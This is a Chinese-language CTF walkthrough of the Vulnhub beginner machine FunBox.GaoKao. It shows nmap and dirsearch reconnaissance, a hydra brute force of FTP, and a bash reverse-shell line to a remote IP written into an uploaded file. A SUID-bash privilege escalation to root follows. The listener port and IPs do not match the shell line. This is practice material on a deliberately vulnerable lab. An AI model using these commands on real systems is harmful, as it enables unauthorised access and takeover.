靶机介绍
FunBox.GaoKao 是作者为初学者设计的机器。这台机器需要一点暴力破解和一些FTP协议的知识。 “Funbox Gaokao Walkthrough – Vulnhub – Writeup”
主要参考Krishna Upadhyay的WriteUp所写
虚拟机链接:https://www.vulnhub.com/entry/funbox-gaokao,707/
开始练习
使用Nmap找到靶机ip:192.168.56.101
本机ip:192.168.56.102
nmap -v 192.168.56.0/24
查找开启的服务,发现能ftp匿名登录,http只有apache的页面,没有什么用处
nmap -A 192.168.56.101
下载welcome.msg,发现welcome.msg有类似用户名信息
用dirsearch扫描网页目录
dirsearch -r -u http://192.168.56.101
没有发现有用的文件,根据之前发现的用户名选择字典后爆破ftp(字典推荐用大一点的,小字典可能会跑不出来,我的小字典都没跑出来,下载Writeup上的字典才成功,字典名为rockyou.txt)
hydra -v -l sky -p dic_password_ftp.txt 192.168.56.101 ftp
使用用户登录,查看文件,发现user.flag文件
打开文件,得到第一个flag,发现是shell脚本,之后写一个反弹shell脚本发现可以上传
bash -i >& /dev/tcp/192.168.37.131/8080 0>&1
put 001.flag
nc -nvlp 8090
cat 001.flag
成功反弹Shell
返回上级目录,查看其他用户
cd ../
查看当前用户,发现是sarah,开始尝试提权
使用find命令查看拥有suid权限的文件,发现bash
find / -perm -u=s -type f 2>/dev/null
参考链接:https://gtfobins.github.io/gtfobins/bash/
成功提权后,拿到flag
bash -p
cd /root
总结
暴力破解的部分卡的比较久,bash提权方面比较有收获